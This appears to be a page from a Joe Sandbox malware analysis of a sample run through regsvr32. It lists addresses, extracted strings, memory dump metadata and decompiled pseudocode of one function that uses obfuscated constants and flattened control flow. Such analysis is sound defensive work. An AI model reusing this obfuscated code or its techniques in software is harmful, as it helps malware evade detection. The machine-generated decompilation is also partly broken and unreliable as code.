0x04b89ca4
0x00000000
0x00000000
0x04b89cc3
0x04b89cca
0x04b89cca
0x00000000
0x04b89cca
0x04b89b05
0x04b89c63
0x04b89c68
0x04b89c6f
0x04b89c77
0x00000000
0x04b89c77
0x04b89b11
0x04b89bf6
0x04b89bfb
0x04b89bfd
0x04b89c26
0x04b89c2f
0x04b89c37
0x00000000
0x04b89c37
0x04b89c06
0x04b89c0f
0x04b89c11
0x04b89c11
0x00000000
0x04b89c11
0x04b89b1d
0x04b89bd1
0x04b89bd6
0x04b89bd8
0x00000000
0x00000000
0x04b89bde
0x00000000
0x04b89bde
0x04b89b29
0x04b89b61
0x04b89b68
0x04b89bbc
0x04b89bbc
0x00000000
0x04b89bbc
0x04b89b95
0x04b89b9a
0x04b89b9d
0x04b89ba4
0x04b89bb7
0x00000000
0x04b89ba6
0x04b89ba6
0x00000000
0x04b89ba6
0x04b89ba4
0x04b89b31
0x00000000
0x04b89b37
0x04b89b50
0x04b89b57
0x00000000
0x04b89b57
0x04b89f21
0x04b89f21
0x04b89f27
0x04b8a137
0x04b8a13d
0x04b8a284
0x04b8a28a
0x04b8a3af
0x04b8a3b4
0x00000000
0x04b8a3b4
0x04b8a290
0x04b8a296
0x04b8a399
0x04b8a39e
0x00000000
0x04b8a39e
0x04b8a29c
0x04b8a2a2
0x04b8a2db
0x04b8a2fd
0x04b8a319
0x04b8a325
0x04b8a33b
0x04b8a356
0x04b8a381
0x04b8a386
0x04b8a386
0x00000000
0x04b8a2a2
0x04b8a143
0x04b8a27a
0x00000000
0x04b8a27a
0x04b8a149
0x04b8a14f
0x04b8a1dd
0x04b8a1e2
0x04b8a1e7
0x04b8a1ea
0x04b8a1ec
0x04b8a1f4
0x04b8a1fb
0x04b8a1fd
0x04b8a218
0x04b8a219
0x04b8a22a
0x04b8a22c
0x04b8a22f
0x04b8a22f
0x04b8a236
0x04b8a239
0x04b8a254
0x04b8a255
0x04b8a264
0x04b8a269
0x04b8a26c
0x04b8a26c
0x04b8a1ee
0x04b8a1ee
0x04b8a1ee
0x04b8a26e
0x04b8a270
0x00000000
0x04b8a270
0x04b8a151
0x04b8a153
0x04b8a1b4
0x04b8a1b9
0x04b8a1ba
0x00000000
0x04b8a1ba
0x04b8a155
0x04b8a15b
0x04b8a18c
0x04b8a191
0x04b8a198
0x00000000
0x04b8a198
0x04b8a15d
0x04b8a163
0x00000000
0x00000000
0x04b8a169
0x04b8a170
0x04b8a172
0x00000000
0x04b8a172
0x04b89f2d
0x04b8a121
0x04b8a126
0x04b8a12d
0x00000000
0x04b8a12d
0x04b89f33
0x04b89f39
0x04b89fd2
0x04b89fd8
0x04b8a106
0x04b8a10b
0x04b8a10d
0x00000000
0x00000000
0x04b8a113
0x00000000
0x04b8a113
0x04b89fde
0x04b89fe4
0x04b8a0e4
0x04b8a0e9
0x04b8a0eb
0x00000000
0x00000000
0x04b8a0f1
0x00000000
0x04b8a0f1
0x04b89fea
0x04b89ff0
0x04b8a066
0x04b8a06d
0x04b8a072
0x04b8a075
0x04b8a077
0x04b8a0b0
0x04b8a0b7
0x04b8a0ba
0x04b8a0c6
0x04b8a0c8
0x04b8a0d3
0x04b8a0d3
0x00000000
0x04b8a0d3
0x04b8a0ca
0x04b8a0cd
0x04b89f85
0x04b89f85
0x00000000
0x04b89f85
0x00000000
0x04b8a0cd
0x04b8a0bc
0x00000000
0x04b8a0bc
0x04b8a08f
0x04b8a090
0x04b8a09f
0x04b8a0a4
0x04b8a0a7
0x04b8a0a9
0x00000000
0x04b8a0a9
0x04b89ff2
0x04b89ff8
0x00000000
0x00000000
0x04b8a00c
0x04b8a015
0x04b8a029
0x04b8a02a
0x04b8a039
0x04b8a03e
0x04b8a041
0x00000000
0x04b8a041
0x04b89f3f
0x04b89fc3
0x04b89fc8
0x00000000
0x04b89fc8
0x04b89f41
0x04b89f47
0x04b8a401
0x00000000
0x04b8a401
0x04b89f4d
0x04b89f53
0x04b89fb0
0x04b89fb5
0x00000000
0x04b89fb5
0x04b89f55
0x04b89f5b
0x04b89f9a
0x04b89f9f
0x00000000
0x04b89f9f
0x04b89f5d
0x04b89f63
0x00000000
0x00000000
0x04b89f70
0x04b89f75
0x04b89f77
0x04b89f80
0x04b89f80
0x00000000
0x04b89f77
0x04b8a3b9
0x04b8a3b9
0x00000000

Strings

08s%, xrefs: 04B8865A
Q2N, xrefs: 04B88DC3
Reo, xrefs: 04B892FD
AW, xrefs: 04B89A55
L}, xrefs: 04B89139
XG, xrefs: 04B88FFA
S, xrefs: 04B8A185
Jvmw, xrefs: 04B88BDD
s2O, xrefs: 04B89953
|V, xrefs: 04B88D29
jmI, xrefs: 04B88FAF
_1, xrefs: 04B89781
"{6, xrefs: 04B89471
C, xrefs: 04B89734
/1, xrefs: 04B893BB
Kx!, xrefs: 04B8997B
LNe, xrefs: 04B891B9
3}, xrefs: 04B89789
;w, xrefs: 04B88B19
t, xrefs: 04B893E3
F, xrefs: 04B890E0
W?n, xrefs: 04B88BF8
Tvs, xrefs: 04B88C30
C", xrefs: 04B8878A
Uj`, xrefs: 04B894FA
BO6, xrefs: 04B899BF
+>, xrefs: 04B89861
E, xrefs: 04B88CF8
t0+, xrefs: 04B8879F
.MZ, xrefs: 04B896D6
C", xrefs: 04B88CBD

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: C$"{6$+>$.MZ$/1$08s%$3}$;w$AW$BO6$C"$C"$Jvmw$Kx!$LNe$Q2N$Reo$S$Tvs$Uj`$W?n$XG$_1$jmI$s2O$t0+$t$|V$E$F$L}
API String ID: 0-3734606162
Opcode ID: d3c437259267a5e6c8ff64a00b1518ab00768d0e2130dd33837d31df5b2801a7
Instruction ID: 1f0f1ddc965b056338868367fbd678d2e1f3a3a2cedd1d7590485a3c3f42208b
Opcode Fuzzy Hash: d3c437259267a5e6c8ff64a00b1518ab00768d0e2130dd33837d31df5b2801a7
Instruction Fuzzy Hash: 20E231B19093818BD7B8DF24C589ADFBBE1BB85308F00892DE5DD96260DBB19945CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B8A871, Relevance: 24.4, Strings: 19, Instructions: 646
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04B8A871(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				signed int _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				unsigned int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				void* _t731;
				signed int _t732;
				signed int _t733;
				signed int _t743;
				signed int _t758;
				void* _t761;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t783;
				void* _t804;
				void* _t861;
				signed int _t865;
				void* _t867;
				signed int* _t868;
				void* _t874;

				_t868 =  &_v2932;
				_v2612 = _v2612 & 0x00000000;
				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0x74b642;
				_v2776 = 0xf885ca;
				_v2776 = _v2776 | 0xffdfd4be;
				_v2776 = _v2776 ^ 0xffffd5d7;
				_v2704 = 0xd88538;
				_v2704 = _v2704 + 0xebcf;
				_v2704 = _v2704 ^ 0x00c97107;
				_v2800 = 0xd52646;
				_v2800 = _v2800 ^ 0xe8dc52fe;
				_v2800 = _v2800 + 0xffffe935;
				_v2800 = _v2800 ^ 0xe804d8f6;
				_v2688 = 0xbafe67;
				_v2688 = _v2688 + 0x9481;
				_v2688 = _v2688 ^ 0x00b13019;
				_v2884 = 0x3d12e1;
				_v2884 = _v2884 << 1;
				_v2884 = _v2884 * 0x55;
				_t867 = __ecx;
				_t861 = 0xbf2cce3;
				_t763 = 0x73;
				_v2884 = _v2884 * 0xf;
				_v2884 = _v2884 ^ 0x605e8f7b;
				_v2696 = 0xf649d9;
				_v2696 = _v2696 / _t763;
				_v2696 = _v2696 ^ 0x000dd9df;
				_v2764 = 0x4a6242;
				_v2764 = _v2764 + 0xffff45cb;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x000572e2;
				_v2784 = 0x8333a2;
				_t764 = 0x2e;
				_v2784 = _v2784 / _t764;
				_v2784 = _v2784 + 0xffffe135;
				_v2784 = _v2784 ^ 0x0005b928;
				_v2852 = 0xf9a739;
				_v2852 = _v2852 | 0x42d1f5c6;
				_v2852 = _v2852 + 0xfffff01c;
				_v2852 = _v2852 ^ 0x42f87d02;
				_v2896 = 0x31e192;
				_v2896 = _v2896 << 0xa;
				_v2896 = _v2896 << 0xa;
				_t765 = 0xb;
				_v2896 = _v2896 * 0x26;
				_v2896 = _v2896 ^ 0xbac011ee;
				_v2928 = 0xcde58e;
				_v2928 = _v2928 | 0x2bdbfaea;
				_v2928 = _v2928 << 8;
				_v2928 = _v2928 | 0x4ddc4764;
				_v2928 = _v2928 ^ 0xdffb1335;
				_v2740 = 0xd63953;
				_v2740 = _v2740 + 0x5c5c;
				_v2740 = _v2740 ^ 0x00d7db1f;
				_v2844 = 0x6db889;
				_v2844 = _v2844 + 0x1eed;
				_v2844 = _v2844 / _t765;
				_v2844 = _v2844 ^ 0x0002c3cf;
				_v2796 = 0x98820d;
				_v2796 = _v2796 | 0x8cff8acf;
				_t766 = 0x43;
				_v2796 = _v2796 / _t766;
				_v2796 = _v2796 ^ 0x021946ce;
				_v2668 = 0x18627d;
				_t767 = 7;
				_v2668 = _v2668 / _t767;
				_v2668 = _v2668 ^ 0x00044156;
				_v2772 = 0x2c7378;
				_v2772 = _v2772 >> 0xb;
				_v2772 = _v2772 >> 6;
				_v2772 = _v2772 ^ 0x000b6d9a;
				_v2880 = 0xd4c7fd;
				_t768 = 0x7b;
				_v2880 = _v2880 / _t768;
				_v2880 = _v2880 + 0xffffaacc;
				_t769 = 0x22;
				_v2880 = _v2880 * 0x2f;
				_v2880 = _v2880 ^ 0x00480dcd;
				_v2920 = 0xe4d6f8;
				_v2920 = _v2920 * 0x42;
				_v2920 = _v2920 + 0xa0b6;
				_v2920 = _v2920 << 8;
				_v2920 = _v2920 ^ 0x000574ec;
				_v2640 = 0xd6ae6b;
				_v2640 = _v2640 | 0xbe6f316b;
				_v2640 = _v2640 ^ 0xbefadf9c;
				_v2836 = 0x6fb4;
				_v2836 = _v2836 + 0xffffc368;
				_v2836 = _v2836 >> 0x10;
				_v2836 = _v2836 ^ 0x0009680a;
				_v2724 = 0x8b61bc;
				_v2724 = _v2724 * 0x75;
				_v2724 = _v2724 ^ 0x3fbdc7d4;
				_v2912 = 0x753704;
				_v2912 = _v2912 >> 0xb;
				_v2912 = _v2912 + 0xd457;
				_v2912 = _v2912 << 1;
				_v2912 = _v2912 ^ 0x000d652f;
				_v2716 = 0xde59a0;
				_v2716 = _v2716 + 0xffff5778;
				_v2716 = _v2716 ^ 0x00d8a7a4;
				_v2752 = 0x428dcf;
				_v2752 = _v2752 / _t769;
				_v2752 = _v2752 | 0x08d5d60c;
				_v2752 = _v2752 ^ 0x08d7d48c;
				_v2828 = 0xe83a42;
				_v2828 = _v2828 ^ 0x1f3eb5e2;
				_v2828 = _v2828 * 0x7e;
				_v2828 = _v2828 ^ 0xab9e63e1;
				_v2788 = 0x69d445;
				_v2788 = _v2788 | 0x87a4a8ed;
				_v2788 = _v2788 ^ 0x9a4d3e24;
				_v2788 = _v2788 ^ 0x1da0be74;
				_v2888 = 0x7663d0;
				_v2888 = _v2888 | 0x8f53a1f3;
				_v2888 = _v2888 >> 0xf;
				_v2888 = _v2888 * 0xa;
				_v2888 = _v2888 ^ 0x000d5ba1;
				_v2644 = 0x20e74e;
				_v2644 = _v2644 | 0x742f98e9;
				_v2644 = _v2644 ^ 0x74210d1b;
				_v2904 = 0xfccdb4;
				_t770 = 0xd;
				_v2904 = _v2904 * 0x7c;
				_v2904 = _v2904 >> 0xd;
				_v2904 = _v2904 | 0x17cf49de;
				_v2904 = _v2904 ^ 0x17c7aae5;
				_v2708 = 0xc1d2f2;
				_v2708 = _v2708 + 0xffff5a94;
				_v2708 = _v2708 ^ 0x00cb5d75;
				_v2660 = 0x58d6fe;
				_v2660 = _v2660 + 0x639e;
				_v2660 = _v2660 ^ 0x00518056;
				_v2652 = 0x6bd84b;
				_v2652 = _v2652 + 0xb95a;
				_v2652 = _v2652 ^ 0x00624667;
				_v2700 = 0xf92c4f;
				_v2700 = _v2700 * 0x75;
				_v2700 = _v2700 ^ 0x71e1c3ce;
				_v2892 = 0xd4714c;
				_v2892 = _v2892 + 0xffffadfa;
				_v2892 = _v2892 + 0xd7d2;
				_v2892 = _v2892 << 2;
				_v2892 = _v2892 ^ 0x0358083c;
				_v2900 = 0xca6485;
				_v2900 = _v2900 ^ 0x66674751;
				_v2900 = _v2900 | 0x9fb8fe7f;
				_v2900 = _v2900 ^ 0xffb729be;
				_v2824 = 0x9c46e2;
				_v2824 = _v2824 / _t770;
				_t771 = 0x6e;
				_v2824 = _v2824 * 7;
				_v2824 = _v2824 ^ 0x005409ff;
				_v2832 = 0x773d17;
				_v2832 = _v2832 >> 0xe;
				_v2832 = _v2832 + 0x6313;
				_v2832 = _v2832 ^ 0x000d17fa;
				_v2792 = 0x3014cc;
				_v2792 = _v2792 + 0xffff152c;
				_v2792 = _v2792 + 0xffff3bdf;
				_v2792 = _v2792 ^ 0x002eea21;
				_v2864 = 0x76e575;
				_v2864 = _v2864 | 0xb1b1a986;
				_v2864 = _v2864 * 0x79;
				_v2864 = _v2864 ^ 0x1e28dcc7;
				_v2712 = 0xf7e6ad;
				_v2712 = _v2712 * 0xb;
				_v2712 = _v2712 ^ 0x0aae7ee0;
				_v2808 = 0xd4cb39;
				_v2808 = _v2808 * 0x50;
				_v2808 = _v2808 * 0x75;
				_v2808 = _v2808 ^ 0x6440f87f;
				_v2720 = 0x360163;
				_v2720 = _v2720 + 0xffffc3fc;
				_v2720 = _v2720 ^ 0x0035ed30;
				_v2816 = 0xf63972;
				_v2816 = _v2816 / _t771;
				_v2816 = _v2816 + 0xffff69c4;
				_v2816 = _v2816 ^ 0x0001f3af;
				_v2728 = 0x218a6d;
				_v2728 = _v2728 | 0x0e9fd07f;
				_v2728 = _v2728 ^ 0x0eb1edc0;
				_v2756 = 0x58a84f;
				_v2756 = _v2756 * 0x22;
				_t772 = 0x3d;
				_v2756 = _v2756 / _t772;
				_v2756 = _v2756 ^ 0x0033367e;
				_v2680 = 0x526d89;
				_v2680 = _v2680 << 3;
				_v2680 = _v2680 ^ 0x02908fe9;
				_v2876 = 0xb95aa0;
				_t773 = 0x6f;
				_v2876 = _v2876 / _t773;
				_v2876 = _v2876 + 0x7ba5;
				_v2876 = _v2876 | 0x4bff3dbe;
				_v2876 = _v2876 ^ 0x4bf5695e;
				_v2748 = 0x470f02;
				_t774 = 0x6a;
				_v2748 = _v2748 / _t774;
				_v2748 = _v2748 ^ 0x394a4d48;
				_v2748 = _v2748 ^ 0x39498008;
				_v2684 = 0xb8f542;
				_v2684 = _v2684 * 0x66;
				_v2684 = _v2684 ^ 0x49b10479;
				_v2812 = 0x4a6932;
				_v2812 = _v2812 >> 7;
				_v2812 = _v2812 ^ 0xe4afcb01;
				_v2812 = _v2812 ^ 0xe4ae05c3;
				_v2932 = 0xa851a7;
				_v2932 = _v2932 * 0x2b;
				_v2932 = _v2932 ^ 0x9481cb07;
				_v2932 = _v2932 >> 6;
				_v2932 = _v2932 ^ 0x02246e93;
				_v2872 = 0x6bc7af;
				_v2872 = _v2872 ^ 0x3226b467;
				_v2872 = _v2872 * 0x1e;
				_v2872 = _v2872 << 0xb;
				_v2872 = _v2872 ^ 0x9c8deb19;
				_v2860 = 0x8556fb;
				_v2860 = _v2860 | 0x69e02514;
				_v2860 = _v2860 + 0xedcb;
				_v2860 = _v2860 ^ 0x69e8258b;
				_v2676 = 0xb187db;
				_v2676 = _v2676 << 0xb;
				_v2676 = _v2676 ^ 0x8c3acae2;
				_v2656 = 0xd34daf;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x0009be95;
				_v2804 = 0x3574a6;
				_v2804 = _v2804 >> 9;
				_v2804 = _v2804 * 0x2a;
				_v2804 = _v2804 ^ 0x00009063;
				_v2760 = 0x8f0143;
				_v2760 = _v2760 * 0x43;
				_v2760 = _v2760 >> 3;
				_v2760 = _v2760 ^ 0x04abe301;
				_v2924 = 0x8fc82d;
				_v2924 = _v2924 << 1;
				_v2924 = _v2924 | 0xafdefbbe;
				_v2924 = _v2924 ^ 0xafdce921;
				_v2840 = 0x98b351;
				_v2840 = _v2840 << 0xe;
				_v2840 = _v2840 + 0x39e2;
				_v2840 = _v2840 ^ 0x2cd1b69a;
				_v2648 = 0xefee4b;
				_v2648 = _v2648 + 0xffff46f9;
				_v2648 = _v2648 ^ 0x00ec21a4;
				_v2848 = 0xd96457;
				_v2848 = _v2848 * 0x6c;
				_v2848 = _v2848 ^ 0xa04c0af4;
				_v2848 = _v2848 ^ 0xfbfff8f9;
				_v2856 = 0xd54255;
				_t775 = 0x29;
				_v2856 = _v2856 / _t775;
				_v2856 = _v2856 + 0x5db9;
				_v2856 = _v2856 ^ 0x00024640;
				_v2780 = 0x684df0;
				_v2780 = _v2780 ^ 0x2cfc36b9;
				_v2780 = _v2780 + 0xffffad37;
				_v2780 = _v2780 ^ 0x2c920bcc;
				_v2664 = 0x93e9a1;
				_v2664 = _v2664 ^ 0xb0758ee6;
				_v2664 = _v2664 ^ 0xb0e547c8;
				_v2692 = 0xe0a4a1;
				_v2692 = _v2692 << 0x10;
				_v2692 = _v2692 ^ 0xa4a3a3bd;
				_v2820 = 0x53ca07;
				_t776 = 0x38;
				_v2820 = _v2820 / _t776;
				_v2820 = _v2820 ^ 0x69a52d4a;
				_v2820 = _v2820 ^ 0x69a742e5;
				_v2768 = 0x45adf5;
				_t777 = 0x28;
				_v2768 = _v2768 / _t777;
				_t778 = 0x33;
				_v2768 = _v2768 * 0x6f;
				_v2768 = _v2768 ^ 0x00c7348a;
				_v2672 = 0xa3622d;
				_v2672 = _v2672 * 0x68;
				_v2672 = _v2672 ^ 0x42518aaf;
				_v2732 = 0xe7d257;
				_v2732 = _v2732 << 0xc;
				_v2732 = _v2732 ^ 0x7d2b6ce8;
				_v2908 = 0xb6fcc8;
				_v2908 = _v2908 / _t778;
				_t779 = 0x63;
				_v2908 = _v2908 * 0x4f;
				_v2908 = _v2908 / _t779;
				_v2908 = _v2908 ^ 0x0008aa55;
				_v2736 = 0xa2e201;
				_t780 = 0x24;
				_v2736 = _v2736 / _t780;
				_v2736 = _v2736 ^ 0x0004c10d;
				_v2916 = 0xc480dc;
				_v2916 = _v2916 + 0xffff6830;
				_v2916 = _v2916 << 0xc;
				_v2916 = _v2916 >> 3;
				_v2916 = _v2916 ^ 0x07d4cd30;
				_v2744 = 0x29dac5;
				_v2744 = _v2744 + 0xffff883e;
				_v2744 = _v2744 ^ 0x002f91a3;
				_v2868 = 0xe49a6a;
				_v2868 = _v2868 + 0xb047;
				_v2868 = _v2868 ^ 0x5e8c4957;
				_v2868 = _v2868 * 0x36;
				_v2868 = _v2868 ^ 0xea21adfb;
				_t731 = E04BA1F6D(_t780);
				_t860 = _v2744;
				_t761 = _t731;
				goto L1;
				do {
					while(1) {
						L1:
						_t874 = _t861 - 0x6dbb171;
						if(_t874 > 0) {
							break;
						}
						if(_t874 == 0) {
							E04BA2B09(_v2908, _v2636, _v2736, _v2916);
							_pop(_t783);
							_t861 = 0x240e9e1;
							continue;
						} else {
							if(_t861 == 0xb8f10d) {
								_push(_v2872);
								_push(_v2932);
								_push(_v2812);
								_t865 = E04B9E1F8(0x4b819bc, _v2684, __eflags);
								E04BA44AD(_v2676, __eflags, _v2656,  &_v1044,  &_v2604, _v2804, _v2760, _t865,  &_v524, _t860, _v2924);
								_t783 = _t865;
								E04B9FECB(_t783, _v2840, _v2648, _v2848, _v2856);
								_t868 =  &(_t868[0xf]);
								_t861 = 0x1618198;
								continue;
							} else {
								if(_t861 == 0x1618198) {
									_push(_t783);
									_t783 = _v2780;
									_t743 = E04B985FF(_t783, _v2664, __eflags, 0,  &_v1044, 0, _v2692, 1, _v2820);
									_t868 =  &(_t868[7]);
									_t861 = 0x2876e66;
									continue;
								} else {
									if(_t861 == 0x1d2207b) {
										E04BA0DB1(_v2852,  &_v2084, __eflags, _v2896, _t783, _v2928);
										 *((short*)(E04B909DD(_v2740,  &_v2084, _v2844, _v2796))) = 0;
										E04B8BAA9(_v2668, _v2772, __eflags, _v2880, _v2920,  &_v1564);
										_push(_v2912);
										_push(_v2724);
										_push(_v2836);
										E04BA2D0A(_v2752, __eflags,  &_v1564, _v2828, _v2788, _v2888, 0x4b8188c,  &_v2604,  &_v2084, E04B9E1F8(0x4b8188c, _v2640, __eflags));
										E04B9FECB(_t748, _v2644, _v2904, _v2708, _v2660);
										_t868 =  &(_t868[0x16]);
										_t743 = E04B8BFBE( &_v2604, _t867, _v2700);
										_pop(_t783);
										__eflags = _t743;
										if(__eflags != 0) {
											_t861 = 0xf749c26;
											continue;
										}
									} else {
										if(_t861 == 0x240e9e1) {
											return E04BA1538(_v2744, _v2868, _v2628);
										}
										if(_t861 != 0x2876e66) {
											goto L25;
										} else {
											_t743 = E04BA2B09(_v2768, _t860, _v2672, _v2732);
											_pop(_t783);
											_t861 = 0x6dbb171;
											continue;
										}
										L29:
									}
								}
							}
						}
						L28:
						return _t743;
						goto L29;
					}
					__eflags = _t861 - 0x9e42b00;
					if(_t861 == 0x9e42b00) {
						_t732 = E04BA0A64(_v2632, _v2636, _v2876, _v2748);
						_t860 = _t732;
						_pop(_t783);
						__eflags = _t732;
						if(__eflags == 0) {
							_t861 = 0x6dbb171;
							goto L25;
						} else {
							_t861 = 0xb8f10d;
							goto L1;
						}
						goto L29;
					} else {
						__eflags = _t861 - 0xa108a7f;
						if(_t861 == 0xa108a7f) {
							_t659 =  &_v2756; // 0x33367e
							_t733 = E04B9D8DB( &_v2628,  &_v2636,  *_t659, _v2680);
							asm("sbb esi, esi");
							_pop(_t783);
							_t861 = ( ~_t733 & 0x07a3411f) + 0x240e9e1;
							goto L1;
						} else {
							__eflags = _t861 - 0xbf2cce3;
							if(_t861 == 0xbf2cce3) {
								_t653 =  &_v2764; // 0x33367e
								_t783 = _v2688;
								E04B81A34(_t783,  &_v524, _t783, _t783, _v2884, _v2696,  *_t653, _t783, _v2776, _v2784);
								_t868 =  &(_t868[8]);
								_t861 = 0x1d2207b;
								goto L1;
							} else {
								__eflags = _t861 - 0xf749c26;
								if(_t861 != 0xf749c26) {
									goto L25;
								} else {
									_v2624 = E04B90CF9();
									_t758 = E04B900C5(_t757, _v2824, _v2832);
									_pop(_t804);
									_v2620 = 2 + _t758 * 2;
									_t783 = _v2792;
									_t743 = E04B8F726(_t783, _v2704, _v2864, _t761, _v2712, _t761, _t761, _v2808, _t804,  &_v2628, _v2720, _v2816, _t804, _v2728);
									_t868 =  &(_t868[0xc]);
									__eflags = _t743;
									if(__eflags != 0) {
										_t861 = 0xa108a7f;
										goto L1;
									}
								}
							}
						}
					}
					goto L28;
					L25:
					__eflags = _t861 - 0x7aa6196;
				} while (__eflags != 0);
				return _t743;
			}

0x04b8a871
0x04b8a877
0x04b8a881
0x04b8a889
0x04b8a894
0x04b8a89f
0x04b8a8aa
0x04b8a8b5
0x04b8a8c0
0x04b8a8cb
0x04b8a8d6
0x04b8a8e1
0x04b8a8ec
0x04b8a8f7
0x04b8a902
0x04b8a90d
0x04b8a918
0x04b8a923
0x04b8a92b
0x04b8a938
0x04b8a93c
0x04b8a943
0x04b8a94a
0x04b8a94d
0x04b8a951
0x04b8a959
0x04b8a96f
0x04b8a976
0x04b8a981
0x04b8a98c
0x04b8a997
0x04b8a99f
0x04b8a9aa
0x04b8a9bc
0x04b8a9c1
0x04b8a9ca
0x04b8a9d5
0x04b8a9e0
0x04b8a9e8
0x04b8a9f0
0x04b8a9f8
0x04b8aa00
0x04b8aa08
0x04b8aa0d
0x04b8aa17
0x04b8aa18
0x04b8aa1c
0x04b8aa24
0x04b8aa2c
0x04b8aa34
0x04b8aa39
0x04b8aa41
0x04b8aa49
0x04b8aa54
0x04b8aa5f
0x04b8aa6a
0x04b8aa72
0x04b8aa80
0x04b8aa84
0x04b8aa8c
0x04b8aa97
0x04b8aaad
0x04b8aab2
0x04b8aabb
0x04b8aac6
0x04b8aad8
0x04b8aadd
0x04b8aae6
0x04b8aaf1
0x04b8aafc
0x04b8ab04
0x04b8ab0c
0x04b8ab17
0x04b8ab23
0x04b8ab28
0x04b8ab2e
0x04b8ab3b
0x04b8ab3c
0x04b8ab40
0x04b8ab48
0x04b8ab55
0x04b8ab59
0x04b8ab61
0x04b8ab66
0x04b8ab6e
0x04b8ab79
0x04b8ab84
0x04b8ab8f
0x04b8ab97
0x04b8ab9f
0x04b8aba4
0x04b8abac
0x04b8abbf
0x04b8abc6
0x04b8abd1
0x04b8abd9
0x04b8abde
0x04b8abe6
0x04b8abea
0x04b8abf2
0x04b8abfd
0x04b8ac08
0x04b8ac13
0x04b8ac27
0x04b8ac2e
0x04b8ac39
0x04b8ac44
0x04b8ac4c
0x04b8ac59
0x04b8ac5d
0x04b8ac65
0x04b8ac70
0x04b8ac7b
0x04b8ac86
0x04b8ac91
0x04b8ac99
0x04b8aca1
0x04b8acab
0x04b8acaf
0x04b8acb7
0x04b8acc2
0x04b8accd
0x04b8acd8
0x04b8ace9
0x04b8acec
0x04b8acf0
0x04b8acf5
0x04b8acfd
0x04b8ad05
0x04b8ad10
0x04b8ad1b
0x04b8ad26
0x04b8ad31
0x04b8ad3c
0x04b8ad47
0x04b8ad52
0x04b8ad5d
0x04b8ad68
0x04b8ad7b
0x04b8ad82
0x04b8ad8d
0x04b8ad95
0x04b8ad9d
0x04b8ada5
0x04b8adaa
0x04b8adb2
0x04b8adba
0x04b8adc2
0x04b8adca
0x04b8add2
0x04b8ade8
0x04b8adf7
0x04b8adfa
0x04b8ae01
0x04b8ae0c
0x04b8ae14
0x04b8ae19
0x04b8ae21
0x04b8ae29
0x04b8ae34
0x04b8ae3f
0x04b8ae4a
0x04b8ae55
0x04b8ae5d
0x04b8ae6a
0x04b8ae6e
0x04b8ae76
0x04b8ae89
0x04b8ae90
0x04b8ae9b
0x04b8aeae
0x04b8aebd
0x04b8aec4
0x04b8aecf
0x04b8aeda
0x04b8aee5
0x04b8aef0
0x04b8af04
0x04b8af0b
0x04b8af16
0x04b8af21
0x04b8af2c
0x04b8af37
0x04b8af42
0x04b8af57
0x04b8af65
0x04b8af6a
0x04b8af73
0x04b8af7e
0x04b8af89
0x04b8af91
0x04b8af9c
0x04b8afa8
0x04b8afad
0x04b8afb3
0x04b8afbb
0x04b8afc3
0x04b8afcb
0x04b8afdd
0x04b8afe0
0x04b8afe7
0x04b8aff2
0x04b8affd
0x04b8b010
0x04b8b017
0x04b8b022
0x04b8b02d
0x04b8b035
0x04b8b040
0x04b8b04b
0x04b8b058
0x04b8b05c
0x04b8b064
0x04b8b069
0x04b8b071
0x04b8b079
0x04b8b086
0x04b8b08a
0x04b8b08f
0x04b8b097
0x04b8b09f
0x04b8b0a7
0x04b8b0af
0x04b8b0b7
0x04b8b0c2
0x04b8b0ca
0x04b8b0d5
0x04b8b0e0
0x04b8b0e8
0x04b8b0f3
0x04b8b0fe
0x04b8b10e
0x04b8b115
0x04b8b120
0x04b8b133
0x04b8b13a
0x04b8b142
0x04b8b14d
0x04b8b155
0x04b8b159
0x04b8b161
0x04b8b169
0x04b8b171
0x04b8b176
0x04b8b17e
0x04b8b186
0x04b8b191
0x04b8b19c
0x04b8b1a7
0x04b8b1b4
0x04b8b1b8
0x04b8b1c0
0x04b8b1ca
0x04b8b1d8
